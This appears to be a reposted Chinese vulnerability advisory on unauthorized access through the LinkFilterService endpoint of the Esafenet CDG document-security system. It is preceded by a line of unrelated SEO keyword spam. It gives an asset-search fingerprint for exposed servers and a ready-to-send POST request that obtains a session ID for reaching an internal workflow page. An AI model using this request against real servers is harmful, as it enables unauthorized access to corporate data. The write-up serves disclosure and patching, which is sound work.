网站的网络营销方案,湖南优度网络科技有限公司,云服务器建设网站用什么系统,网站建设丶金手指花总14产品简介
亿赛通电子文档安全管理系统#xff0c;#xff08;简称#xff1a;CDG#xff09;是一款电子文档安全加密软件#xff0c;该系统利用驱动层透明加密技术#xff0c;通过对电子文档的加密保护#xff0c;防止内部员工泄密和外部人员非法窃取企业核心重要数据资…产品简介
亿赛通电子文档安全管理系统简称CDG是一款电子文档安全加密软件该系统利用驱动层透明加密技术通过对电子文档的加密保护防止内部员工泄密和外部人员非法窃取企业核心重要数据资产对电子文档进行全生命周期防护系统具有透明加密、主动加密、智能加密等多种加密方式用户可根据部门涉密程度的不同如核心部门和普通部门部署力度轻重不一的梯度式文档加密防护实现技术、管理、审计进行有机的结合在内部构建起立体化的整体信息防泄露体系使得成本、效率和安全三者达到平衡实现电子文档的数据安全。
漏洞描述
亿赛通电子文档安全管理系统 linkfilterservice 未授权攻击者可通过此漏洞获取服务器敏感信息。
资产测绘
app“亿赛通-电子文档安全管理系统”
漏洞复现
POST /CDGServer3/LinkFilterService HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 98
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencodedpathBOFGGPFBFIFPBHFMGKGIuserIdGCGHGAGGFAFHFGFCFEFPFDcurDBNJOADCFBOPECMNBCOHMDMDKGCMMLFFCJCACB获取JSESSIONID的值访问/CDGServer3/workflowE/myToDoList.jsp
整改建议
升级至安全版本